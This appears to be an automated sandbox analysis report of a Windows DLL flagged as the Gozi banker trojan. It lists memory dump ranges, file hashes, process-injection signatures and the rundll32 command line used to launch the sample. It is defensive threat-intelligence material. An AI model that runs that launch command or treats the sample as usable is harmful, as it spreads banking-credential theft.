MD5 c8a97f1dc1f5f7d6a4c06d85b571fb6a
SHA1 df4baab1acfb310fc6902eaf21a10190276911e6
SHA256 ca3a662c0fcaf789658a69bd384676722dedb108e9b6ca54db9ad416151aaa99
SHA512 185514736165cb836059519f2624bd7dabbb4e608b8a5bcea81f14b6646804f4bd3283bc21fa2445c34c2cc3d067bbc821b0bfdc6244fbfe12f61599b7026be6

memory/804-193-0x00000000080F0000-0x0000000008193000-memory.dmp

memory/4208-199-0x000001ACF0FA0000-0x000001ACF0FDC000-memory.dmp

memory/3772-204-0x0000028FC9E40000-0x0000028FC9EE3000-memory.dmp

memory/1344-211-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp

memory/3440-210-0x0000024550AD0000-0x0000024550B73000-memory.dmp

memory/4112-216-0x000001A2A7FA0000-0x000001A2A8043000-memory.dmp

memory/3772-226-0x0000028FC9840000-0x0000028FC9841000-memory.dmp

memory/2232-223-0x0000016F03410000-0x0000016F034B3000-memory.dmp

memory/3772-228-0x0000028FC9E40000-0x0000028FC9EE3000-memory.dmp

memory/3440-230-0x0000024550120000-0x0000024550121000-memory.dmp

memory/3440-232-0x0000024550AD0000-0x0000024550B73000-memory.dmp

memory/804-233-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/804-234-0x00000000080F0000-0x0000000008193000-memory.dmp

memory/1344-235-0x0000024AE4080000-0x0000024AE4081000-memory.dmp

memory/1344-236-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp

memory/4112-237-0x000001A2A5DB0000-0x000001A2A5DB1000-memory.dmp

memory/4112-238-0x000001A2A7FA0000-0x000001A2A8043000-memory.dmp

memory/2232-239-0x0000016F03200000-0x0000016F03201000-memory.dmp

memory/2232-242-0x0000016F03410000-0x0000016F034B3000-memory.dmp

memory/3184-241-0x000001F225DB0000-0x000001F225E53000-memory.dmp

memory/3184-246-0x000001F225B70000-0x000001F225B71000-memory.dmp

memory/3184-247-0x000001F225DB0000-0x000001F225E53000-memory.dmp

memory/1344-248-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp

memory/4844-250-0x0000000000B60000-0x0000000000BF8000-memory.dmp

memory/4844-253-0x0000000000B60000-0x0000000000BF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 1d0b80729108e13e765fa8b5dbc325b0
SHA1 155a3f53b166d45c70f4444c2603b6ceb95d4f9e
SHA256 4078dfa5ba175d50a27b6f7d1eb134da661cf559038b601986bc27beddb3a59b
SHA512 f3adc98b8a9288f80bf023cb691cf4d8e78fa7fa5e6e22eced1c6dcec9ea0e842fef609a06c92d2cd3d7c572e60aaaa4bb0a5821ab987b53f8ac68561b240b94

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/804-257-0x00000000080F0000-0x0000000008193000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 1b8cd7fcdf04c98cd645bef0eefb2cf4
SHA1 cdc096cf188ba6240896cb15c64008446e1bc26e
SHA256 4d5c6b07f98f91df9f3c52f77ab336ad3c58ed2e58ae70910e386e2dafc1af0b
SHA512 e43b8da32f4f5c09e0ce7644fd56bc5864cb93b5d195ffe03505a536c784877c0421ffffeea644fb49518ddb76b95684803018af2eb37d3da1ce766ec45d3a49

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 1b8cd7fcdf04c98cd645bef0eefb2cf4
SHA1 cdc096cf188ba6240896cb15c64008446e1bc26e
SHA256 4d5c6b07f98f91df9f3c52f77ab336ad3c58ed2e58ae70910e386e2dafc1af0b
SHA512 e43b8da32f4f5c09e0ce7644fd56bc5864cb93b5d195ffe03505a536c784877c0421ffffeea644fb49518ddb76b95684803018af2eb37d3da1ce766ec45d3a49

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-08 16:15

Reported

2023-03-08 16:17

Platform

win7-20230220-en

Max time kernel

70s

Max time network

35s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

Signatures

Gozi

banker trojan gozi

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2020 wrote to memory of 2012 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

Network

N/A

Files

memory/2012-54-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-55-0x0000000000210000-0x0000000000216000-memory.dmp

memory/2012-56-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-57-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-59-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-60-0x0000000001F40000-0x0000000002F40000-memory.dmp